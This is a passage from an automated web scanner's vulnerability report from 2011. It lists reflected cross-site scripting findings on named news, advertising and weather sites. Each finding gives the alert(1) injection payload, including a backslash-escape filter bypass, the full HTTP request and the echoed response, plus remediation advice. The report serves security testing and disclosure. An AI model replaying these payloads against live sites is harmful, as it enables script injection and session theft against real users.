Confidence:   Firm
Host:   http://tools.themercury.com.au
Path:   /feeds/feed-ticker.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8f7e9\'%3beb302189a6e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8f7e9\\';eb302189a6e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, then the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /feeds/feed-ticker.php?category_id=1&range=0to6&rss_name=-breaking-/8f7e9\'%3beb302189a6enews HTTP/1.1
Host: tools.themercury.com.au
Proxy-Connection: keep-alive
Referer: http://www.themercury.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:18:22 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n30 ( lax-agg-n26), ms lax-agg-n26 ( origin>CONN)
Cache-Control: max-age=301
Expires: Wed, 07 Sep 2011 14:23:24 GMT
Age: 0
Content-Length: 1137
Content-Type: text/html
Vary: Accept-Encoding
Connection: keep-alive

document.write('<ul id="TickerVertical"><li><a href="http://tools.themercury.com.au/stories/48249541-breaking-/8f7e9\\';eb302189a6enews.php"><span class="time">12:01 am</span>Lighter winds help Texas
...[SNIP]...

2.60. http://tools.themercury.com.au/feeds/feed-ticker.php [rss_name parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tools.themercury.com.au
Path:   /feeds/feed-ticker.php

Issue detail

The value of the rss_name request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3eb9a\'%3balert(1)//bc3ffbac64e was submitted in the rss_name parameter. This input was echoed as 3eb9a\\';alert(1)//bc3ffbac64e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, then the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /feeds/feed-ticker.php?category_id=1&range=0to6&rss_name=-breaking-news3eb9a\'%3balert(1)//bc3ffbac64e HTTP/1.1
Host: tools.themercury.com.au
Proxy-Connection: keep-alive
Referer: http://www.themercury.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:18:02 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n30 ( lax-agg-n41), ms lax-agg-n41 ( origin)
Cache-Control: max-age=301
Expires: Wed, 07 Sep 2011 14:23:03 GMT
Age: 0
Content-Length: 1191
Content-Type: text/html
Vary: Accept-Encoding
Connection: keep-alive

document.write('<ul id="TickerVertical"><li><a href="http://tools.themercury.com.au/stories/48249541-breaking-news3eb9a\\';alert(1)//bc3ffbac64e.php"><span class="time">12:01 am</span>Lighter winds he
...[SNIP]...

2.61. http://tools.themercury.com.au/feeds/feed-with-lead.php [rss_name parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tools.themercury.com.au
Path:   /feeds/feed-with-lead.php

Issue detail

The value of the rss_name request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4d0c1\'%3balert(1)//461c9fa19a4 was submitted in the rss_name parameter. This input was echoed as 4d0c1\\';alert(1)//461c9fa19a4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /feeds/feed-with-lead.php?category_id=3&range=0to6&rss_name=-world-news4d0c1\'%3balert(1)//461c9fa19a4&1801 HTTP/1.1
Host: tools.themercury.com.au
Proxy-Connection: keep-alive
Referer: http://www.themercury.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:18:03 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n30 ( lax-agg-n47), ms lax-agg-n47 ( origin)
Cache-Control: max-age=301
Expires: Wed, 07 Sep 2011 14:23:04 GMT
Age: 0
Content-Length: 1692
Content-Type: text/html
Vary: Accept-Encoding
Connection: keep-alive

document.write('<div class="article-extracts-box"><div class="me2-extract-box"><div class="ark-img-class"><a href="http://tools.themercury.com.au/stories/48248721-world-news4d0c1\\';alert(1)//461c9fa19a4.php" >
...[SNIP]...

2.62. http://tools.themercury.com.au/yoursay/yoursay-single-extract.php [range parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tools.themercury.com.au
Path:   /yoursay/yoursay-single-extract.php

Issue detail

The value of the range request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6edf0'%3balert(1)//32abf63a0ea was submitted in the range parameter. This input was echoed as 6edf0';alert(1)//32abf63a0ea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /yoursay/yoursay-single-extract.php?range=0to16edf0'%3balert(1)//32abf63a0ea HTTP/1.1
Host: tools.themercury.com.au
Proxy-Connection: keep-alive
Referer: http://www.themercury.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:17:51 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n30 ( lax-agg-n26), ms lax-agg-n26 ( origin>CONN)
Cache-Control: max-age=301
Expires: Wed, 07 Sep 2011 14:22:53 GMT
Age: 0
Content-Length: 195
Content-Type: text/html
Vary: Accept-Encoding
Connection: keep-alive

get_Comment_Summary:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '16edf0';alert(1)//32abf63a0ea' at line 3

2.63. http://tps30.doubleverify.com/visit.js [plc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tps30.doubleverify.com
Path:   /visit.js

Issue detail

The value of the plc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 10382'%3balert(1)//53fe50912c2 was submitted in the plc parameter. This input was echoed as 10382';alert(1)//53fe50912c2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /visit.js?ctx=1074175&cmp=5795406&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=1&plc=6973337710382'%3balert(1)//53fe50912c2&advid=2977403&sid=1089807&adid=&btreg=245334907&btsvrreg=doubleclick&&num=395&srcurl=http%3A%2F%2Fwww.watoday.com.au%2F&curl=&qpgid=&referrer=http%3A%2F%2Fad.doubleclick.net%2Fadi%2FN6560.159469.AOD-INVITE%2FB5795406.3%3Bsz%3D300x250%3Bclick%3Dhttp%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwVjDEOgDAMA7.CMlOpTZqQ8JsCZUJsTIi_406.k2y_JELrFM4m80TCEC.V1WAFQk1bNw1Oed8i1SM8ee.RmPfWfTvNitOYjvKinJdh4yeQiqxZHFiB93NdQAMWVNW.H_rWG4A-%26redirectURL%3D%3Bord%3Da5ae6592-0cb9-4d98-8ee9-22cae8bf6618%3F HTTP/1.1
Host: tps30.doubleverify.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=2733665-13225b1b58a-2854b473-10; __utma=209764608.1020985525.1314892399.1314892399.1314892399.1; __utmz=209764608.1314892399.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:267-HSA-807&token:_mch-doubleverify.com-1314892398926-27601

Response

HTTP/1.1 200 OK
Connection: close
Content-Type: text/javascript; charset=utf-8
Expires: 9/6/2011 2:14:25 PM
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 07 Sep 2011 14:14:24 GMT
Content-Length: 586

function obaCallback() { new OBACan({ "agncid": '1074175', "cmpid": '5795406', "plcid": '6973337710382';alert(1)//53fe50912c2', "sid": '1089807' }, { "advName": 'Yahoo', "advLink": 'http://www.doubleverify.com/PreferenceManager', "advPolicy": 'http://info.yahoo.com/privacy/us/yahoo/details.html', "advLogoURL": '', "networkNa
...[SNIP]...

2.64. http://tps30.doubleverify.com/visit.js [sid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tps30.doubleverify.com
Path:   /visit.js

Issue detail

The value of the sid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2f581'%3balert(1)//47784fca2f9 was submitted in the sid parameter. This input was echoed as 2f581';alert(1)//47784fca2f9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /visit.js?ctx=1074175&cmp=5795406&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=1&plc=69733377&advid=2977403&sid=10898072f581'%3balert(1)//47784fca2f9&adid=&btreg=245334907&btsvrreg=doubleclick&&num=395&srcurl=http%3A%2F%2Fwww.watoday.com.au%2F&curl=&qpgid=&referrer=http%3A%2F%2Fad.doubleclick.net%2Fadi%2FN6560.159469.AOD-INVITE%2FB5795406.3%3Bsz%3D300x250%3Bclick%3Dhttp%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwVjDEOgDAMA7.CMlOpTZqQ8JsCZUJsTIi_406.k2y_JELrFM4m80TCEC.V1WAFQk1bNw1Oed8i1SM8ee.RmPfWfTvNitOYjvKinJdh4yeQiqxZHFiB93NdQAMWVNW.H_rWG4A-%26redirectURL%3D%3Bord%3Da5ae6592-0cb9-4d98-8ee9-22cae8bf6618%3F HTTP/1.1
Host: tps30.doubleverify.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=2733665-13225b1b58a-2854b473-10; __utma=209764608.1020985525.1314892399.1314892399.1314892399.1; __utmz=209764608.1314892399.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:267-HSA-807&token:_mch-doubleverify.com-1314892398926-27601

Response

HTTP/1.1 200 OK
Connection: close
Content-Type: text/javascript; charset=utf-8
Expires: 9/6/2011 2:14:25 PM
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 07 Sep 2011 14:14:24 GMT
Content-Length: 652

function obaCallback() { new OBACan({ "agncid": '1074175', "cmpid": '5795406', "plcid": '69733377', "sid": '10898072f581';alert(1)//47784fca2f9' }, { "advName": 'Yahoo', "advLink": 'http://www.doubleverify.com/PreferenceManager', "advPolicy": 'http://info.yahoo.com/privacy/us/yahoo/details.html', "advLogoURL": '', "networkName": 'AOD - Invite
...[SNIP]...

2.65. http://web.adblade.com/imps.php [description_color parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://web.adblade.com
Path:   /imps.php

Issue detail

The value of the description_color request parameter is copied into the HTML document as plain text between tags. The payload b77c7<script>alert(1)</script>c31484a0f21 was submitted in the description_color parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /imps.php?app=3695&ad_width=300&ad_height=250&title_font=1&title_color=000000&description_font=1&description_color=0066ccb77c7<script>alert(1)</script>c31484a0f21&id=83&output=html&tpUrl=http://r1-ads.ace.advertising.com/click/site=0000801647/mnum=0000905406/cstr=35058392=_4e677c35,2342476011,801647^905406^1184^0,1_/xsxdata=$xsxdata/bnum=35058392/optn=64?trg=http%3a%2f%2fwww.adblade.com HTTP/1.1
Host: web.adblade.com
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __sgs=E9sOpfn38Vyk9ev7mYc4l253DJxNrTy2kDg72IC7%2BsE%3D; __tuid=3269600676904920279; __qca=P0-1392796123-1315103186293

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.8
P3P: policyref="http://adblade.com/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Vendor: Adblade LLC | Adblade| http://www.adblade.com
Set-Cookie: __impt=1315404872.307975972358; expires=Thu, 08-Sep-2011 14:14:32 GMT; path=/
Content-type: text/html
Date: Wed, 07 Sep 2011 14:14:32 GMT
Server: lighttpd/1.4.21
Content-Length: 9519

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="content-type" content="text/html; ch
...[SNIP]...
font-family:Arial,Helvetica,sans-serif; }
.adDescription1_83, .adDescription1_83:link, .adDescription1_83:visited, .adDescription1_83:hover {
color:#0066ccb77c7<script>alert(1)</script>c31484a0f21; font-family:Arial,Helvetica,sans-serif; }
.adImage1_83 {
}
</style>
...[SNIP]...

2.66. http://web.adblade.com/imps.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://web.adblade.com
Path:   /imps.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8499"><script>alert(1)</script>d5e2cbfbbc8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /imps.php?app=3695&ad_width=300&ad_height=250&title_font=1&title_color=000000&description_font=1&description_color=0066cc&id=83&output=html&tpUrl=http://r1-ads.ace.advertising.com/click/site=0000801647/mnum=0000905406/cstr=35058392=_4e677c35,2342476011,801647^905406^1184^0,1_/xsxdata=$xsxdata/bnum=35058392/optn=64?trg=http%3a%2f%2fwww.adblade.com&d8499"><script>alert(1)</script>d5e2cbfbbc8=1 HTTP/1.1
Host: web.adblade.com
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __sgs=E9sOpfn38Vyk9ev7mYc4l253DJxNrTy2kDg72IC7%2BsE%3D; __tuid=3269600676904920279; __qca=P0-1392796123-1315103186293

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.8
P3P: policyref="http://adblade.com/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Vendor: Adblade LLC | Adblade| http://www.adblade.com
Set-Cookie: __impt=1315404886.755567528598; expires=Thu, 08-Sep-2011 14:14:46 GMT; path=/
Content-type: text/html
Date: Wed, 07 Sep 2011 14:14:46 GMT
Server: lighttpd/1.4.18
Content-Length: 9843

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="content-type" content="text/html; ch
...[SNIP]...
tp://r1-ads.ace.advertising.com/click/site=0000801647/mnum=0000905406/cstr=35058392=_4e677c35,2342476011,801647^905406^1184^0,1_/xsxdata=$xsxdata/bnum=35058392/optn=64?trg=http%3a%2f%2fwww.adblade.com&d8499"><script>alert(1)</script>d5e2cbfbbc8=1http://www.smarterlifestyles.com/2010/06/01/the-advantages-of-buying-penny-stocks/?fc_id=27698&fc_app_id=3695" target="_blank">
...[SNIP]...

2.67. http://web.adblade.com/imps.php [title_color parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://web.adblade.com
Path:   /imps.php

Issue detail

The value of the title_color request parameter is copied into the HTML document as plain text between tags. The payload e21e9<script>alert(1)</script>71985f1b570 was submitted in the title_color parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /imps.php?app=3695&ad_width=300&ad_height=250&title_font=1&title_color=000000e21e9<script>alert(1)</script>71985f1b570&description_font=1&description_color=0066cc&id=83&output=html&tpUrl=http://r1-ads.ace.advertising.com/click/site=0000801647/mnum=0000905406/cstr=35058392=_4e677c35,2342476011,801647^905406^1184^0,1_/xsxdata=$xsxdata/bnum=35058392/optn=64?trg=http%3a%2f%2fwww.adblade.com HTTP/1.1
Host: web.adblade.com
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __sgs=E9sOpfn38Vyk9ev7mYc4l253DJxNrTy2kDg72IC7%2BsE%3D; __tuid=3269600676904920279; __qca=P0-1392796123-1315103186293

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.8
P3P: policyref="http://adblade.com/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Vendor: Adblade LLC | Adblade| http://www.adblade.com
Set-Cookie: __impt=1315404871.460171727576; expires=Thu, 08-Sep-2011 14:14:31 GMT; path=/
Content-type: text/html
Date: Wed, 07 Sep 2011 14:14:31 GMT
Server: lighttpd/1.4.26
Content-Length: 9522

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="content-type" content="text/html; ch
...[SNIP]...
_83:link, .adTitle1_83:visited, .adTitle1_83:hover,
.adLearnMoreLink1_83, .adLearnMoreLink1_83:link, .adLearnMoreLink1_83:visited, .adLearnMoreLink1_83:hover {
color:#000000e21e9<script>alert(1)</script>71985f1b570; font-family:Arial,Helvetica,sans-serif; }
.adDescription1_83, .adDescription1_83:link, .adDescription1_83:visited, .adDescription1_83:hover {
col
...[SNIP]...

2.68. http://web.adblade.com/imps.php [tpUrl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://web.adblade.com
Path:   /imps.php

Issue detail

The value of the tpUrl request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90d3e"><script>alert(1)</script>1b4d7655608 was submitted in the tpUrl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /imps.php?app=3695&ad_width=300&ad_height=250&title_font=1&title_color=000000&description_font=1&description_color=0066cc&id=83&output=html&tpUrl=http://r1-ads.ace.advertising.com/click/site=0000801647/mnum=0000905406/cstr=35058392=_4e677c35,2342476011,801647^905406^1184^0,1_/xsxdata=$xsxdata/bnum=35058392/optn=64?trg=http%3a%2f%2fwww.adblade.com90d3e"><script>alert(1)</script>1b4d7655608 HTTP/1.1
Host: web.adblade.com
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __sgs=E9sOpfn38Vyk9ev7mYc4l253DJxNrTy2kDg72IC7%2BsE%3D; __tuid=3269600676904920279; __qca=P0-1392796123-1315103186293

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.8
P3P: policyref="http://adblade.com/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Vendor: Adblade LLC | Adblade| http://www.adblade.com
Set-Cookie: __impt=1315404878.796731717138; expires=Thu, 08-Sep-2011 14:14:38 GMT; path=/
Content-type: text/html
Date: Wed, 07 Sep 2011 14:14:38 GMT
Server: lighttpd/1.4.21
Content-Length: 9822

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="content-type" content="text/html; ch
...[SNIP]...
ttp://r1-ads.ace.advertising.com/click/site=0000801647/mnum=0000905406/cstr=35058392=_4e677c35,2342476011,801647^905406^1184^0,1_/xsxdata=$xsxdata/bnum=35058392/optn=64?trg=http%3a%2f%2fwww.adblade.com90d3e"><script>alert(1)</script>1b4d7655608http://www.smarterlifestyles.com/2010/06/01/the-advantages-of-buying-penny-stocks/?fc_id=27698&fc_app_id=3695" target="_blank">
...[SNIP]...

2.69. http://webservice.theweather.com.au/ws1/wx.php [fc parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://webservice.theweather.com.au
Path:   /ws1/wx.php

Issue detail

The value of the fc request parameter is copied into the HTML document as plain text between tags. The payload e045d<a>fe882287f62 was submitted in the fc parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ws1/wx.php?lt=twcid&lc=9528&obs=1&fc=1e045d<a>fe882287f62&days=5&rollover=24&u=10491-perthnow&k=5fb8723d47d60afa6ddf07191acaf3b0 HTTP/1.1
Host: webservice.theweather.com.au
Proxy-Connection: keep-alive
Referer: http://media.perthnow.com.au/multimedia/weatherWidget/5dayForecast/nopromo/WeatherWidget_11.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 DAV/2
Content-Length: 1659
Content-Type: text/xml
Cache-Control: max-age=300
Expires: Wed, 07 Sep 2011 14:20:15 GMT
Date: Wed, 07 Sep 2011 14:15:15 GMT
Connection: close

<?xml version="1.0" encoding="iso-8859-1" ?>
<data>
<metadata>
<sector>weather</sector>
<title>Weatherzone</title>
<provider>Weatherzone</provider>
<provider_url>http://www.wea
...[SNIP]...
<forecasts type="1E045D<A>FE882287F62">
...[SNIP]...

2.70. http://www.7perth.com.au/javascript.js [a parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.7perth.com.au
Path:   /javascript.js

Issue detail

The value of the a request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload f0dfc%3balert(1)//7471910ea1e was submitted in the a parameter. This input was echoed as f0dfc;alert(1)//7471910ea1e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /javascript.js?file=crossfade&a=cf1f0dfc%3balert(1)//7471910ea1e&b=crossfader&c=aW50ZXJ2YWw6MTYuMCxkdXJhdGlvbjoyLGF1dG9TdGFydDp0cnVlLHNldFNpemU6dHJ1ZQ== HTTP/1.1
Host: www.7perth.com.au
Proxy-Connection: keep-alive
Referer: http://www.7perth.com.au/view/seven-news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ifm3c4tfcqeoamntp6t3t0q3u2

Response

HTTP/1.1 200 OK
Cache-Control: public, maxage=31536000
Content-Type: text/javascript
Date: Wed, 07 Sep 2011 14:15:03 GMT
Expires: Thu, 06 Sep 2012 14:15:03 GMT
Pragma: public
Server: Apache/2.2.16 (Amazon)
X-Powered-By: PHP/5.3.6
Content-Length: 123
Connection: keep-alive

var cf1f0dfc;alert(1)//7471910ea1e = new Crossfade('crossfader', { interval:16.0,duration:2,autoStart:true,setSize:true });

2.71. http://www.7perth.com.au/view/2/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.7perth.com.au
Path:   /view/2/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload f4033<a>d6e90fbbbbf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /view/2/?f4033<a>d6e90fbbbbf=1 HTTP/1.1
Host: www.7perth.com.au
Proxy-Connection: keep-alive
Referer: http://www.7perth.com.au/view/seven-news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
